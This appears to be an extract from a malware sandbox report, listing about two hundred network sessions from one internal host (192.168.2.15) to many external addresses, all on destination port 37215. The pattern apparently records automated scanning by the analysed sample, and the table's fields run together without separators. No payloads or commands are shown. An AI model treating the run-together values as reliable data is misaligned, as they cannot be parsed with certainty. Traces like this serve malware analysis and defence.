                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5532192.168.2.1539152197.53.167.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5533192.168.2.1540228210.74.97.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5534192.168.2.1554568197.47.251.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5535192.168.2.1541568157.187.127.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5536192.168.2.1535748213.79.241.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5537192.168.2.153664241.1.178.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5538192.168.2.1534612157.98.43.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5539192.168.2.1537746157.180.226.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5540192.168.2.1545864131.41.166.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5541192.168.2.1542432132.107.150.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5542192.168.2.154526641.135.36.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5543192.168.2.155442441.86.112.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5544192.168.2.154379841.88.133.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5545192.168.2.154596241.247.215.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5546192.168.2.1559922197.137.125.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5547192.168.2.1535452197.44.6.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5548192.168.2.1537722140.40.124.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5549192.168.2.1536738157.92.116.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5550192.168.2.1533170108.231.162.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5551192.168.2.1544684197.71.119.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5552192.168.2.1560128134.114.51.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5553192.168.2.1539166210.135.33.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5554192.168.2.154001041.161.113.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5555192.168.2.1560112197.178.136.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5556192.168.2.1550986197.149.4.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5557192.168.2.1557322197.209.141.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5558192.168.2.155461441.238.171.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5559192.168.2.1554484140.139.129.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5560192.168.2.1556654197.93.120.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5561192.168.2.15499864.43.61.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5562192.168.2.153370899.49.92.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5563192.168.2.1560804157.232.92.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5564192.168.2.1536390210.103.196.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5565192.168.2.1547730157.46.75.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5566192.168.2.1536198157.20.25.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5567192.168.2.1552024157.101.195.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5568192.168.2.1543522190.30.132.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5569192.168.2.155882020.216.5.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5570192.168.2.155035241.45.25.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5571192.168.2.155783483.24.17.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5572192.168.2.1540496157.197.130.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5573192.168.2.155638086.76.85.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5574192.168.2.1538038197.194.225.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5575192.168.2.1555990209.12.249.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5576192.168.2.153477241.91.108.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5577192.168.2.155497481.25.90.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5578192.168.2.1558538157.116.6.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5579192.168.2.1545050222.229.106.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5580192.168.2.153799441.223.203.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5581192.168.2.1552764128.88.26.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5582192.168.2.154692841.28.10.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5583192.168.2.154482866.126.147.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5584192.168.2.1558060155.153.19.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5585192.168.2.1550504100.248.253.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5586192.168.2.1533138157.188.246.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5587192.168.2.154520841.210.70.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5588192.168.2.154331241.183.22.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5589192.168.2.1542458197.127.204.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5590192.168.2.1560744157.21.84.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5591192.168.2.155512880.194.134.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5592192.168.2.153426032.39.204.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5593192.168.2.1537424197.167.202.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5594192.168.2.1543678197.47.34.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5595192.168.2.1544840157.196.9.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5596192.168.2.154694225.54.89.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5597192.168.2.1543310157.134.45.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5598192.168.2.1547706157.243.216.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5599192.168.2.155701441.202.135.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5600192.168.2.1540988128.10.161.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5601192.168.2.1556388157.212.224.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5602192.168.2.155911441.198.7.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5603192.168.2.1543074157.103.75.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5604192.168.2.1541928190.122.194.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5605192.168.2.1550624157.177.103.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5606192.168.2.1546654157.192.252.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5607192.168.2.155743887.23.87.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5608192.168.2.154608040.211.29.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5609192.168.2.1555778140.251.86.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5610192.168.2.1555392192.119.58.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5611192.168.2.153816241.124.58.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5612192.168.2.155017241.180.251.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5613192.168.2.1552422173.238.138.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5614192.168.2.1539430197.70.249.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5615192.168.2.1559458197.30.21.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5616192.168.2.153843041.62.153.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5617192.168.2.155812241.253.134.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5618192.168.2.153867241.162.58.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5619192.168.2.155368041.171.1.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5620192.168.2.155725241.184.168.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5621192.168.2.153556241.244.215.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5622192.168.2.155496618.247.198.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5623192.168.2.1534224117.44.76.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5624192.168.2.1555062157.88.8.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5625192.168.2.1559144197.172.250.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5626192.168.2.1537806197.139.249.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5627192.168.2.155587241.105.236.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5628192.168.2.1557960197.163.126.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5629192.168.2.154947041.163.135.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5630192.168.2.1554370157.193.2.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5631192.168.2.1538988157.85.157.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5632192.168.2.1548348157.134.203.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5633192.168.2.154307641.121.143.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5634192.168.2.1545582157.112.75.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5635192.168.2.1534076101.219.88.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5636192.168.2.1538244157.130.82.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5637192.168.2.1543712197.151.105.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5638192.168.2.1536362197.187.47.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5639192.168.2.155921641.198.234.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5640192.168.2.154371431.213.212.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5641192.168.2.1558344157.187.104.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5642192.168.2.155776041.181.82.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5643192.168.2.155155041.170.139.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5644192.168.2.1539718157.140.66.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5645192.168.2.1548384197.48.65.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5646192.168.2.155321641.168.213.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5647192.168.2.153547841.105.137.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5648192.168.2.1555372197.47.40.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5649192.168.2.155706641.8.102.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5650192.168.2.1539626197.221.89.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5651192.168.2.155157441.162.195.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5652192.168.2.1542978129.117.87.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5653192.168.2.1552052209.68.96.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5654192.168.2.155350464.140.128.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5655192.168.2.1537808208.122.24.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5656192.168.2.153680241.69.118.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5657192.168.2.1552224157.144.206.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5658192.168.2.1548228125.79.189.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5659192.168.2.153769447.63.59.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5660192.168.2.155116452.219.128.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5661192.168.2.154497441.40.86.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5662192.168.2.1540230178.148.168.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5663192.168.2.155234241.243.131.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5664192.168.2.1549782194.102.219.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5665192.168.2.155594041.103.175.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5666192.168.2.1548662210.108.72.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5667192.168.2.1535164157.53.21.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5668192.168.2.155398265.195.28.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5669192.168.2.1537972185.68.155.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5670192.168.2.1533562145.145.93.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5671192.168.2.1546244197.130.71.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5672192.168.2.155518436.212.0.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5673192.168.2.1538102157.144.166.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5674192.168.2.153932041.17.142.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5675192.168.2.1549834197.169.253.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5676192.168.2.1547706157.238.87.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5677192.168.2.155008641.2.228.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5678192.168.2.154070841.250.94.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5679192.168.2.155140486.180.43.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5680192.168.2.1542036205.160.133.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5681192.168.2.1546238197.68.126.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5682192.168.2.1536158157.156.159.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5683192.168.2.155168241.50.58.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5684192.168.2.155300294.85.141.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5685192.168.2.1544494122.49.40.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5686192.168.2.155881441.218.154.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5687192.168.2.1538096157.200.59.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5688192.168.2.1539246157.193.38.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5689192.168.2.154727890.54.236.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5690192.168.2.155008441.106.229.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5691192.168.2.155937876.205.58.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5692192.168.2.155594041.107.130.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5693192.168.2.154706642.130.207.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5694192.168.2.155449286.63.45.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5695192.168.2.1546258197.10.7.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5696192.168.2.15505582.111.37.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5697192.168.2.1559554157.126.111.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5698192.168.2.155701041.188.253.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5699192.168.2.1547364157.22.99.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5700192.168.2.155375241.151.213.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5701192.168.2.1558306157.241.63.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5702192.168.2.1539900157.111.213.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5703192.168.2.154994841.17.37.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5704192.168.2.155992040.141.135.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5705192.168.2.1541764157.41.144.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5706192.168.2.1548880107.197.245.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5707192.168.2.1544024197.45.74.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5708192.168.2.1558762197.122.28.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5709192.168.2.1535870157.219.192.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5710192.168.2.1550714197.83.127.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5711192.168.2.1559206197.30.202.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5712192.168.2.1549720157.44.247.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5713192.168.2.1544228197.71.144.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5714192.168.2.1541230197.56.255.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5715192.168.2.1544884157.254.63.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5716192.168.2.153538641.148.83.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5717192.168.2.155011049.86.196.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5718192.168.2.1537980189.249.233.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5719192.168.2.155049441.184.206.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5720192.168.2.153292841.156.147.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5721192.168.2.155748641.32.58.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5722192.168.2.1544318197.56.111.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5723192.168.2.1544910157.39.167.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5724192.168.2.1547542197.36.238.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5725192.168.2.155714418.34.29.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5726192.168.2.154588293.200.210.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5727192.168.2.1560730157.221.228.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5728192.168.2.1549632157.119.52.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5729192.168.2.154691641.161.56.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5730192.168.2.1554150197.23.197.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5731192.168.2.154681441.54.147.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5732192.168.2.1546294197.22.217.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5733192.168.2.1557712197.203.59.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5734192.168.2.1551312157.133.217.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5735192.168.2.1554358144.32.0.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5736192.168.2.1560936157.224.190.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5737192.168.2.155761677.170.111.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5738192.168.2.154440241.182.229.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5739192.168.2.1551872197.157.171.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5740192.168.2.154582070.161.195.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
